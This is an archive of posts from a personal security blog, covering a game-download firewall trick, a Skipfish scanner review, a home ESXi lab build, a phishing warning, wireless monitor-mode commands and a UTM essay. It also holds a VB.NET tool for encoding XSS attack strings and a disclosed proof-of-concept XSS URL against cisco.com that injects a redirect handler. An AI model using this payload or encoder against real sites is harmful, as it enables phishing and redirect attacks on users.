Confessions Of A Dangerous Mind

The wonderful Starcraft 2 Wings of Liberty has been released earlier this week, and as a hardcore fan of the original game, wanted to get it just as it roll out, which meant the environmental way of downloading a digital copy.

If you happen to know Blizzard ( the magnificent ! ), their distribution tool is based on 2 channels, one which is the direct downloader over HTTP, and the other which is P2P based. which is the main issue when a new game rolls out, since there werent enough ppl that could share parts, and thus rendered the download for me ( in Israel ) to 90Kbps total, which is about 900Kbps under my acceptable ratio.

So i decided to go for the following – first i will download over a VM in the normal way ( so i could share like a normal user ), but i wanted to play right away (why else would i buy at day 0 ? :) so i had a second download running in the same time on my main computer, which i wanted to “tweak”.

The direction for me was to disable the P2P vector on my main computer, so i could download only from the HTTP source, which then climbs the the limits, and so i did.

When looking into the Log in the downloader i found the tracker ( the distributor of the list that is used to connect beteen the P2P users ) and found it to be http://eu.tracker.worldofwarcraft.com

then i ran a DNS Lookup on the FQDN of : eu.tracker.worldofwarcraft.com and got back a single resolution to - 80.239.178.125

In the following step, i configured a Firewall Rule to block any traffic from my computer to that IP Address, in order to prevent the sharing distribution.

The result was easy , the few seconds after the rule as been configured, the P2P connections dropped, and the entire download reverted to HTTP, which then made the download climb to 500KBPS, and eventually to 1.1MBPS

so i still let the VM download, so i would share the bits to let other users play, but i also started enjoying this fantastic game right away!.

Way to go Blizzard !

Labels: access, concepts, english, guide, starcraft

Posted by barry at 12:10 PM | Link | Comments

after getting really interested in a late Google project, i spent few hours today with Google’s Skipfish v1.25b , which is a Google project for a web application security scanner , or as some times referred in the professional arena – a WVS ( web vulnerabilities scanner ) and is completely open source as i like it.

as i mentioned, i am playing with version v.1.25b ( although 1.26b is available at time of writing the article ) against a vulnerable demo web application that i wrote a few months back… and got some impressions on the current version.

first of all, i have to admit , its blazing fast … once given a destination to scan, the scan is fast , and the results are displayed in a very elegant way ( although a bit too hardcore ) moreover the depth and methods of detecting problems are quite impressive.

that being said .. the security checks themselves missed lots of the application vulnerabilities , including some quite basic SQL Injections which were there especially for security demonstrations. but i will give the credit and wait until this tool matures a little more before i try it again , and i am sure it will be much better.

the report is excellent , very insightful and shows track of the trace of the stream until the vulnerability has been detected , which is always good, nevertheless – i would like to see in future versions some different export mechanisms of reports, such as XML and PDF, to make it more usable in the IT security ecosystem environment.

there is a point to remember that at current time it is being written and managed by one person at Google , as compared to enterprise tools such as IBM’s Rational AppScan or Qualys etc, so you have to give credit here :)

for ease of use , it is easy , but i do expect a UI , since most people that will run this scanner will require some interaction with it that does not require any CLI / Linux skills, since it is not in their job requirements , they just need to run a tool and test for baseline ( unfortunately that also includes lots of “consultants” ).

if i am to rate this tool , i would rate it at its current version (1.25b) with 6.5 of 10 for now , since i really like the speed and the overall architecture of it , but i do see the need for some more maturity and some more robust security tests.

it detected 9 of 14 SQLi and 4 of 8 XSS , and none of the 4 persistent XSS vulnerabilities ( although it claims to detect it ) .. and yes , i have fed it some credentials as needed..

its a descent alternative to lots of the tools out there even in its current stage , and i would definitely go back to it when some holes are put to its belt.

Finally, just a quick install HOW-TO for it.
if you want to install it under CentOS ( i used 5.2 ) then do the following :

1. download and extract the tgz file anywhere ( example : tar zxpfv skipfish*.tgz )
2. install some neccesary packages for the install

- yum instll gcc
- yum install openssl-devel
- yum install libidn-devel

3. step into the folder extracted and run – make
4. there you go. :)

Labels: consulting, english, hacking, linux, software, technology

Posted by barry at 9:23 PM | Link | Comments

For a while now , i have been thinking about building a Lab Server at home , that will save me time and effort for my day to day dev and other tech stuff. and decided to go with VMWare’s ESXi solution for a virtual environment.

My basic requirements were :

1. need to run at least 6 resource demanding machines at the same time
2. need for virtual networking
3. silence in my lab
4. performance.

After some spec digging , I finally went for the following spec :

• Motherboard : Gigabyte GA-X58A-UD3R (link)
• Memory : Crosair 12GB (6x2GB) DDR3 1333 (link)
• CPU : Intel i7 920 (link)
• CPU Cooler : Thremaltake V1-AX CPU Cooler (link)
• HD : 4x WD Caviar Blue 500GB 7200RPM 16MB WD5000AAKS (link)
• RAID Controller : Adaptec 2405S (link)
• Display : Gigabyte HD 4350 512MB GDDR2 DX10.1 HDTV DVI HDMI PCI-E (link)
• Case : Antec - Nine Hundred Two (link)
• PSU : Thermaltake ToughPower W0103 600W PFC (link)
• Additional NIC : Intel PRO/1000 GT Desktop Adapter (link)

Although the Motherboard of my choice includes 3 (!) built in RAID controllers for different raid approaches , i had to introduce a more robust RAID controller that will support my demand for performance ( RAID 10 ) , will offload the CPU cycles to a dedicated processor , and will also be supported by VMWare ESXi , which is not trivial. same reason goes for the additional NIC – the Intel PRO/1000 MT is there in order for the ESXi HSC to have all drivers and hardware in my box officially supported.

Some design decisions :

• first , i wanted to make sure that the network card is officially supported , because as of now , VMWare only supports specific certified hardware ( an up-to date list of supported hardware can always be found here ) but the problematic ones are always the network controller and the disk controller (which halt the install if the install process doesn't like them). that's why i went with an Intel one, which at the time can be purchased in eBay for around 25-30$.
• for the disks , i chose 4 x Caviar Blue 500GB disks, and wanted to use them as a RAID 10 array , so all and all i will get 1TB of extremely fast storage, and i chose the Caviar Blue, because unlike the Caviar Green which throttles down to save energy , i need performance – and the Caviar Blue maintains a constant 7200RPM rate.
• the network card consumed my one and only PCI slot on the Motherboard , so although i was already considering a PCI Express RAID Controller , this became an essential part. at first i thought i could try to use one of the onboard RAID controllers , but VMWare rejected them, which at the end was ok – since by introducing the Ataptec card , all of the CPU cycles that are required to maintain the RAID are offloaded to a dedicated processor on the card. choosing the adaptec was fairly easy , since i wanted 4 disks in RAID 10 and PCI Express , and then i came across this article from Overclock3d.net which was enough to convince me im taking the right approach.
• for power supply i went as i always do with a Thermaltake Toughpower PSU , which i calculated based on their online PSU calculator , and multiplied by 1.6 as I always do when scaling a PSU.
• for RAM , just wanted a Triple Channel memory, and as much of it as i can get for a descent price, same as for display – i just had to have a display adapter in , so this was a cheap one with DVI+VGA+HDMI which made sense to have for future screens if i ever need one on this system.
• for the chasis , i wanted a box that will be cool , good air flow and fanning , and will be easy to build a heavy duty system into. my only complain will be that in order to mount drives , i had to take out the drive bay out ( the bold holders are hidden ) which took some time, but other than that , its an impressive beast. a good review of the box could be found here.

The ESXi latest version at time of install is the 4.0U1 which has more than a handful of features.

I am a happy chap today.

not one of my standard posts … but hey , its my blog :)

Barry.

Labels: architecture, desi, design, english, vmware

Posted by barry at 2:36 PM | Link | Comments

As a passion, I keep developing my side projects and different concepts that always were of interest to me, and during that process I have always had to build input validation tools to overcome threats like SQL Injection or XSS etc. or even just to make sure that a user enters just the input type that i require of him.

That being said, I knew that it was easier to just build a simple framework that will retrieve both valid type input schemes to validate inputs against them , and also to build a simple yet robust signature matching engine that will help me build one framework that is dynamic and that i can include in any project that is built. Finally I decided to just release it to everyone who may find a use for it, and named it JSecurityModule.

Enjoy.

Labels: code, english, java

Posted by barry at 11:30 PM | Link | Comments

[ A Rewrite of this post in english , due to the importance ]

A few days back , I received a nice gift via my Msn IM account, i got the following link :

http://myparties.piclooks.com/?<user> ( where <user> is the infected sender ). in that case i got it through MSN , so i dont tknow if any other IM is compromised.

when clicking on that link you would get the following web window -

That screen immediately raised my suspicion that there is something wrong here. an unknown site is asking for my MSN / Hotmail credentials in order to provide me a service which natively could be provided via a normal API... so i started checking.

Viewing the client side source code was very nice , cause it shows a very simple - almost child-like html code that is generated via simple tools.

An IP address (  64.34.154.82 ) was embedded in, which is not something that you would expect from a service, very unusual.

When disecting the URL to its basics and just going to piclooks.com , you would get the following output ( meaning , there is no actual homepage behind this application )

The summary is very simple , this is most probably a phising site , and not a very sophisticated one , which its whole purpose is to steal the online identities of those who are naive enough to play along.

be careful of this hoax.

Labels: english, passwords, privacy, sbn, script, spam, threats, virus, vulnerability

Posted by barry at 7:26 AM | Link | Comments

Confessions Of A Dangerous Mind הוא בלוג שהתחלתי לכתוב בשלהי 2006 , שהתחיל בכלל באנגלית והוסב לעברית כשראיתי שמעטים הבלוגרים שנותנים תשומת לב לתעשייה הישראלית.

לאחרונה הצטרפתי לצוות כתיבת בלוג אבטחת המידע של חברת Imperva בה אני עובד, הבלוג נקרא ImperViews וכותבים בו אנשים שונים מהארגון.

כתוצאה מכך, אתחיל לפצל את הכתיבה בין הבלוגים.

הזמן יגיד לאן ילך רוב הפוקוס.

בארי.

Confessions Of A Dangerous Mind is a blog ive been writing since the late 2006. This blog that started out as an English blog an later transferred in whole to a Hebrew one in order to pay attention to the Israeli industry.

Lately, I have joined Imperva's blogging team for the Security Blog - ImperViews, which is being written by different people at Imperva organization.

Following that decision, I will probably split my writing between this blog and the ImperViews Blog... Time will tell where I will put my focus.

- Barry.

Labels: blog, english, imperva, links, news

Posted by barry at 10:55 PM | Link | Comments

As some of you may already know , one of my biggest and oldest hobbies is linux.

As such , the first thing i will try with almost any computer \ laptop \ device i get - is to try a linux distro on it , and test it for playfulness . but most of the times , these computers are not mine , so its kind of helping guys out on the way.

This past week , ive been asked with a question by a collegue of mine , and that is actually a question that i get alot regarding wireless hacking with a linux box. the question is "how do i set my wifi card to Promiscuous Mode ?" which is something many new guys on a linux platform find hard to achive. and it is a very important knowledge for anyone in the Pentesting field , or if its a "hobbie".

The reason for that is preety simple... when you want to use your card for packet injection , and sniffing - you need to put it on a passive mode. this moe is called "Monitor-Mode" when refering to linux. after you do that - you can usually fire up any wireless hacking \ sniffing program that you want.

The problem is that on some cases , trying to set up the card to Monitor Mode by issuing the command : iwconfig ath0 mode Monitor , will result in an "Invalid Input" or a "Set Mode (8B06)" message on your screen. and any attempt to change that will not be succesful, even if you use patched drivers ( like MadWifi ) and such.

The solution to that is quite simple actually. use the wlanconfig tool.

In order to change the card's mode to the desired one , first of all - put it to sleep by issuing the command ifconfig ath0 down ( ath0 stands for the interface's name ). then use the wlanconfig tool by issuing the following commands :

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ifconfig ath0 up

Thats it. your card is now in Monitor Mode.

In order to put the card to the original state , repeat this sequence of commands, but instead of choosing the wlanmode monitor , choose wlanmode managed.

Hope this short guide was helpful.

Labels: code, english, hacking, linux

Posted by barry at 3:17 PM | Link | Comments

לפני מספר חודשים כתבתי עבור חודש XSS של גיא מזרחי כלי פשוט יחסית , שמטרתו הייתה בעצם להמיר מחרוזות פשוטות לדצימלי , ובכך לאפשר לבנות מחרוזות להתקפת XSS בצורה קלה יותר...

מספר אנשים פנו וביקשו את הקוד הפשוט יחסית , ובכן שיניתי מספר דברים בעקבות מיילים ותגובות בכל מיני מקומות שונים , כדי לפשט. הנה זה פשוטו כמשמעו ... כפי שוודאי ניתן להביא מדובר סה"כ בהמרות מהקסה למבנה דצימלי ובחזרה , כעת כבר לכל המחרוזת , שינוי שבוצע בעקבות בקשות במיילים.

ישנם ממירים רבים להורדה באינטרנט , חלקם אפילו נכתבו על ידי RSnake בכבודו ובעצמו, אך מי שמכיר אותי יודע שאם זה לא יצא מהידיים שלי , זה אומר שאני לא ממשיך הלאה לנושא הבא ...

הנה הקוד הסופי ... .NET כמו שאתם אוהבים .

For my english reading audience - this is my code for converting text into decimal codes for applying XSS attacks , in .NET for your convinence. enjoy ...

Public Class XSS_Translator

    Public Function hex2dec(ByVal hextext As String) As String
        hex2dec = Chr(Convert.ToInt32(Mid(hextext, 2, 2), 16))
    End Function

    Public Function myConvert(ByVal INPUT As String, ByVal Act As Integer) As String
        Dim myresult As String
        Dim i As Integer

        For i = 1 To Len(INPUT)
            If Act = 1 Then
                myresult = myresult & "%" & Hex(Asc(Mid(INPUT, i, 1)))
            Else
                If (Mid(INPUT, i, 1) = "%") And (i <= (Len(INPUT) - 2)) Then
                    myresult = myresult & hex2dec(Mid(INPUT, i, 3))
                    i = i + 2
                Else
                    myresult = myresult & Mid(INPUT, i, 1)
                End If
            End If
        Next
        myConvert = myresult
    End Function

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        If RadioButton1.Checked = True Then
            outputBox.Text = myConvert(inputBox.Text, 1)
        Else
            outputBox.Text = myConvert(inputBox.Text, 2)
        End If
    End Sub

End Class

Labels: algorithmics, code, english, script, technology, vulnerability, xss

Posted by barry at 5:59 PM | Link | Comments

סוף שנת 2007 מתקרבת ( אפילו לפי ספירת סיסקו ) ואיתה הסיכום המתבקש לבוא לאירועי אבטחת המידע של 2007 , והטרנדים שהיו , או התגלו שלא היו ...

אשמח לקבל מכם Input לפני שאני מסכם ומוציא לאור פוסט שכזה.

While 2007 is coming to an end soon ( even by cisco's calander ) - a summary of all security events , trends and things that went wrong - is just behind the corner...

I would love to get some of your input on this , so my summary will be more complete when its finally out.

Labels: blog, english, news, social

Posted by barry at 5:48 PM | Link | Comments

A few days back , I have read about a Cross-Site-Scripting vulnerability in cisco's search engine. this vulnerability enables a hacker to use the cisco.com website for phishing purposes and for "man-in-the-browser" attacks.

With the code ( posted as a link ) following , one could send a user to cisco's website and bounce off to his own bogus machine. i did not check for any further enrichments of this exploit , but it seems strange that this kind of thing could come out on a website that is as secure as cisco.com. I really believe that there are Application Layer Firewalls defending cisco's website, and if there are any - are they misconfigured ?

I have reported this vulnerability to a friend of mine at cisco's security proffesional services team in EMEA , and i hope this will soon be fixed.

Here is the POC code :

http://cisco.com/pcgi-bin/search/search.pl?searchPhrase=%27+onmouseover%3D%22location.href%3D%28%27http%3A%2F%2Fwww.cnn.com%27%29%22+value%3D%27&x=20&y=15&accessLevel=Guest&language=en&country=US&Search+All+Cisco.com=cisco.com

Notice that the code bounces you to www.cnn.com website , but anything can be put here. which makes you wonder ...

Anyway, I cannot give credit to this code to any specific Hacker\Hacking Group because i have seen a similar code at more than one of my resources , each from a different country . strangely enough - they all came out in the same 24 hours. script kiddies ?

As i was promised by my cisco friend - this is not a light weighted issue for a company of that size , and i believe that the fix will come very soon.

Labels: english, hacking, sbn, vulnerability, xss

Posted by barry at 12:32 AM | Link | Comments

Labels: english, sbn, script, solution, utm

Posted by barry at 12:08 AM | Link | Comments

לבקשת מר אלן שימל - VP פיתוח אסטרטגי בחברה האמריקאית - StillSecure , ומחבר אחד הבלוגים האמינים והאיכותיים יותר בתעשיה ( קישור כאן ) , הצטרפתי לרשת הבלוגרים העולמית לאבטחת מידע בשם SBN . רשת זו נחשבת אמינה באופן יחסי מבחינת סוג האנשים אשר מקושרים אליה , ולכן שמחתי לקבל הצעה זו ממר אלן ולהצטרף.

קישור לרשת הSecurity Bloggers Network נמצא כאן

כמחווה , אני רואה לנכון להוסיף לתפריט הבלוג ( צד ימין למטה ) את הבאנר הרלוונטי לרשת זו. ואני מקווה שקו הבלוגר שלי יפעל להרחיב אופקים גם כלפי חו"ל. אגב - זה אומר שיהיו כאן מידי פעם פוסטים באנגלית. לפחות יותר מהרגיל.

Labels: blog, english, news, sbn

Posted by barry at 9:40 PM | Link | Comments

Labels: blog, english, links, syndication, utm

Posted by barry at 6:29 AM | Link | Comments

all of my hebrew readers . please excuse me , but because i want to make this post handy for other nc2400 users - i will post it in english.

i have got my hands on a new HP NC2400 laptop that replaced my older Dell D620 laptop. and here is how i set up my fedora 7 on it.

first of all ... i must admit - almost everything worked out of the box . which is quite amazing for a branded laptop ... maybe the only 2 things that didnt work were the wireless "Intel IPW945/PRO Wireless (rev 2.0) wireless card , and the AutheTed fingerprint reader . well since i do not use the fingerprint reader - i did not even set it up , so excuse me all of you finger print users.

my set up is quite simple - gnome with beryl , 2.6 kernel and the rest are networking\pentesting tools ... that are not worth mentioning

wifi -
i am thinking of how to give you the easiest way to bring it up ...
well its easy ...

fist esit the file "/etc/modprobe.d/blacklist file and add the following lines :
--
#IPW3945
blacklist iwl3945
blacklist mac80211
--

and reboot it ...
then add the "freshrpms.net" repository ... and run "yum search ipw3945"
install the dkms package , the ipw3945d package and the ipw3945 firmware package ...
reboot and your done .

the 12.1 inch resolution was also automatic , so no use for 915_resolution tool , you may want to install the wpa_supplicant tool in order to connect to wpa2 easier.

i would also recommend running the NetworkManager tool to manage the network connections from within gnome . i personally disabled the eth1 ( the wifi interface ) automatic dhcp via the /etc/sysconfig/network-scripts/ifcfg-eth1 file

thats about it . everytning is running fine , yum update rand perfectly , and its a gogogo from now on.

enjoy linux.

Labels: english, linux, technology

Posted by barry at 5:16 PM | Link | Comments

Labels: english

Posted by barry at 1:40 PM | Link | Comments

The world of IT security technologies has evolved greatly for the last 5 years.
By understanding the structure of the current threats that threatens the IT environment of corporate infrastructure – security vendors have created very highly crafted technologies to deal with these threats. We had some major breakthroughs with IPS technologies that currently serves both signature based and proactive scanning methods, Antivirus and AntiSpam technologies can now inspect information to the deepest levels . and there are more than enough URL filtering mechanisms that serves about every major company that require these kind of services to be implemented on their users surfing habits.

UTM is something pretty fresh In that aspect, we’ve seen it growing In the last
couple of years as a major aspect for creating “All-In-One” solutions. The concept is
brought to life by taking one machine that is taking care of stateful firewalling , advanced routing ,IPSec connectivity, and giving it the extra edge by allowing it to connect to modules such as the IPS, AntiSpam, Antivirus and the URL Filtering mechanism to create a full blown inspection gateway that scans just about everything that passes through it, and decide based on scan results if to pass the traffic or rather stop and log it and that point of entry.
Now lets look at the problem. By the UTM concept – our IT should be “secured”
If we are using a UTM device at our core network environment . but – what about
blended threats ? , what about attack and code mutations?
In the second half of 2005 , many analysts and security engineers have faced new
types of attacks , the blended ones , and the mutated ones. These attacks were crafted to skip from one method to the other , from one technology to the other , and IT security measures where if you had a virus , an antivirus solution would have taken care of it, And if you had a DoS attack , the Firewall would have taken care of it , but when an attack would have begun as an Exploit that injects a virus that later on sends out spam and infects other entities via IM , or via SMB – systems are useless to these attacks.

The problem with the UTM concept today – is that companies that manufacture
these solutions , are applying OEM solutions with other vendors . one could OEM with
the best-of-breed antivirus company for his AV module , and OEM with the best-of-breed IPS company for the IPS module and pass the traffic through the both of them . but ! and here is the problem – the modules of different vendors , could not speak to each other . each module of its own honorable vendor is written as a closed source application and can receive traffic from one end , check it and pass it through , but when the IPS module and AV module co-exist but cannot take mutual decisions on the traffic that passes through – blended threats could not be inspected in any way . mutations of the traffic will pass as if there was nothing there to stop them.

Let me explain further more : when the UTM device is used to establish a layer 3
up to layer 7 connection between two entities , it inspects the traffic . now – if there is a mutation attack of some kind ( here is just an example ) – a session is being established
via VPN between two entities , and runs just http traffic between the two. The
termination of the IPSec is being done by the UTM device , which cannot see up until
now if there was an attack hidden in the traffic that came through the IPSec tunnel . then the data is getting into the http server with a 0day exploit on it , so the IPS does not know it. And sends a file that was previously accepted by the UTM device because of the tunnel access control rules. Contains a virus , and the attacker entity is passing it through an IM service . the new crafted virus is the populating itself not via IM , but via SMB , and when that occurs – the virus manipulates itself to attack the core switch via a simple DDoS attack. no UTM device would stop this attack , no single entity to take care of one module will stop this attack. The solution is being send from one or two vendors today , that have come to
mind that if they write their own antivirus , they can manipulate it , and if the IPS code is their proprietary code , they could manipulate is , and where the URL filter is a service which they own . modifications and alterations could be performed . the main issue here is that if you are the sole vendor for all modules inside your UTM device , you can ask them to speak to each other , you could take access control decisions based o blended results of the traffic that passes through your device , and because of stateful technologies, you could understand the deep behavior of your traffic , and so – have access control decisions done by the deepest analysis available.

By creating a single-vendor solution , one is able to interconnect the different
security modules and create a real UTM device , in my terms – “Real UTM” is applicable only if the device , and the different modules come from the same vendor , so it could sanitize the traffic using decisions based on a matrix check of each packet.

The following diagram ( D01 ) shows how a current concept UTM device actually passes
the traffic :



On current UTM environments , the packet actually has to go through each and every
module as a stage of inspection. What may happen is that one module might not be
certain if the packet contains an attack and so not mark it as attack and pass it on. The attack will pass between the different “Best Of Breed” modules and no decision will be taken to drop the packet , because no module found a specific attack in the mechanism and if it could , it wouldn’t be able to tell the following module about the attack because of different technologies , and vendor code confidentiality.

The following diagram ( D02 )shows exactly what happens to a packet that runs through
what is considered a real utm :



What is clearly visible from this diagram , is that a packet that runs through a real
UTM mechanism , runs through each and every one of the modules . note : if a packet is being intercepted by the IPS mechanism – it will ask for the antivirus to check it too , and so on for the AntiSpam and every UTM module. And later on , the UTM mechanism will decide based on scan checks from all of the modules , if to pass it on , or to drop the packet. It is not session based , but packet based.
Now , what is happening in that environment is that each module can give some
kind of grading to the packet , even if it is not sure it is an attack . next , the UTM consolidation engine can grade the packet based on all of the modules , and have a sophisticated decision to drop or to accept the packet , and that is after a real deep inspection.

A new UTM RFC/Protocol is required.

One cannot realize how major vendors will exchange code parts between them,
But maybe some kind of a consolidation protocol is needed here . we had ICAP in the
past to check for different traffic methods, maybe now is the time to write a new protocol that inspection modules could grade traffic by , and a consolidated decision could be made.

In conclusion , the UTM world is a wonderful and insightful world, the best of the
vendors are doing a great effort in order to give us the best practice results and the solutions we require. But because of misleading assumptions ,that “attacks may be more sophisticated but they still spread in the same ways” the UTM world will not be complete. What should be the concept is “an attack can come In different ways and
blended ways , check them all and never skip a phase”.

Labels: english, technology, thesis, utm

Posted by barry at 8:42 PM | Link | Comments